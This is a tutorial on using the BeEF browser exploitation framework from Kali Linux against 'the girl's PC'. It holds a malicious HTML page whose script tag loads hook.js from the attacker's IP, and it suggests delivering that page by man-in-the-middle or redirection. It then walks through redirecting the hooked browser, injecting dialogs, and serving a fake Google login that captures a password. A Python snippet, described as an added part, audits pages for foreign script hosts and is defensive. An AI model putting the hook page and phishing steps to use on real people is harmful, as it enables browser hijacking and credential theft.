Environment:
Kali Linux (192.168.0.114): the hacker's machine
Windows 7 (192.168.0.113): the girl's PC
Meet BeEF
BeEF (The Browser Exploitation Framework) is a browser attack framework written in Ruby. It is installed by default in Kali and is used to attack and exploit XSS vulnerabilities.
BeEF works by inserting a JavaScript file called hook.js into a web page. When a browser visits a page that contains hook.js, it becomes hooked. The hooked browser runs some initial code and returns basic information. The target host then sends a request to the BeEF server at regular intervals (the default is 1 second), asking whether there is new code to execute. The BeEF server is essentially a web application with a front end and a back end. The front end polls the back end for new data, and the front end can also send instructions to the back end. The BeEF operator logs in to the BeEF back end through a browser to control the front end (the user's browser). BeEF is generally used in conjunction with XSS vulnerabilities.
Start BeEF
Method 1: Click the icon in the bar to start.
Method 2: Execute the command beef-xss
Kali already ships beef-xss as a service, so we can also use the systemctl command to start or stop the BeEF service:
systemctl start beef-xss.service    # Start the beef service
systemctl stop beef-xss.service     # Stop the beef service
systemctl restart beef-xss.service  # Restart the beef service
Note: On first run, the initial configuration asks us to enter a username and password (set them yourself).
After startup completes, the browser opens the management page automatically. Enter the username and password we just set and log in to the system. The initial account and password are beef.
Configure our hooks
There are two methods, described briefly here:
Method 1: Find a website containing an XSS vulnerability and insert the JS there to reach the target.
Method 2: Write a malicious web page yourself for others to visit. (Internal network + external network)
Here we take Method 2 as the example and write a simple page.
<!doctype html>
<html>
<head>
<meta charset='utf-8'>
<title>la la la la la la la la la</title>
</head>
<body>
<h1>bbskali.cn</h1>
<script src='http://192.168.0.114:3000/hook.js'></script>
</body>
</html>
In other words, getting others to visit the page I just wrote achieves the goal of the attack. There are many ways to do that, such as man-in-the-middle attacks, redirection, planted black pages, etc.
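Seen from the defending side, the hook is nothing more than a script tag that points at a foreign origin, so it can be found by auditing which hosts a page loads scripts from. The following is an added example, not part of the original tutorial: the function names, the allowlist parameter and the page URL site.example are assumptions, and the sample HTML is constructed from the page shown above.

```python
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urljoin, urlsplit

class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())

def audit_scripts(html, page_url, allowed_hosts):
    """Return (url, reasons) for each script loaded from a host that is
    neither the page's own host nor in allowed_hosts (hypothetical allowlist)."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    page_host = urlsplit(page_url).hostname
    findings = []
    for src in parser.sources:
        url = urljoin(page_url, src)  # resolves relative and //host forms
        parts = urlsplit(url)
        host = parts.hostname or ""
        if host == page_host or host in allowed_hosts:
            continue
        reasons = ["host not in allowlist"]
        if parts.scheme == "http":
            reasons.append("loaded over plain HTTP")
        try:
            ip_address(host)
            reasons.append("IP-literal host")
        except ValueError:
            pass  # a DNS name, not an IP address
        if parts.port not in (None, 80, 443):
            reasons.append(f"non-standard port {parts.port}")
        if parts.path.rsplit("/", 1)[-1] == "hook.js":
            reasons.append("file name matches the hook.js script")
        findings.append((url, reasons))
    return findings

# Constructed sample: the tutorial's page plus one same-site script.
SAMPLE = """<!doctype html><html><head><meta charset='utf-8'>
<script src='/static/app.js'></script></head><body><h1>bbskali.cn</h1>
<script src='http://192.168.0.114:3000/hook.js'></script></body></html>"""

if __name__ == "__main__":
    for url, reasons in audit_scripts(SAMPLE, "https://site.example/", set()):
        print(url, "->", "; ".join(reasons))
```

The file name check is the weakest signal because a hook script can be renamed; the host allowlist is what does the real work.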
Attack Demo
Demo 1 (device online)
When the target visits our web page, we can see the device come online in the BeEF console.
Device Attack
Click on our device and select the Commands tab. We can see that there are many attack modules.
Readers may notice a small colored circle (green, gray, orange, red) in front of each module.
Internally, BeEF detects which command modules can work in the currently hooked browser and indicates this by color:
Green: The command module can run on the target browser, and the user will not notice anything abnormal.
Orange: The command module can run on the target browser, but the user may notice something abnormal (such as pop-ups, prompts, redirects, etc.).
Gray: The command module has not been verified for this target, i.e. it is not known whether it can run.
Red: The command module does not work for this target.
Here are a few modules as a demonstration. Explore the rest yourselves!
Let the browser automatically access the specified website
Click Browser--Hooked Domain--Redirect Browser, enter our target URL and click Execute to complete the attack. Returning to the page I just opened, I found that it had automatically jumped to the Kali forum.
Pop up dialog box
Click Browser--Hooked Domain--Create Alert Dialog, enter the information we want to pop up and click Execute to complete the attack.
The effect is as follows
Pop up an input dialog box
Click Browser--Hooked Domain--Create Prompt Dialog, enter the information we want to pop up and click Execute to complete the attack.
In the same way, after we enter the information, we can see what we just entered in the management panel!
Results
Make a phishing website
Select Social Engineering--Google Phishing and set it to our Kali IP address. Click Execute.
Our page has become Google's login page.
Enter our username and password
Password obtained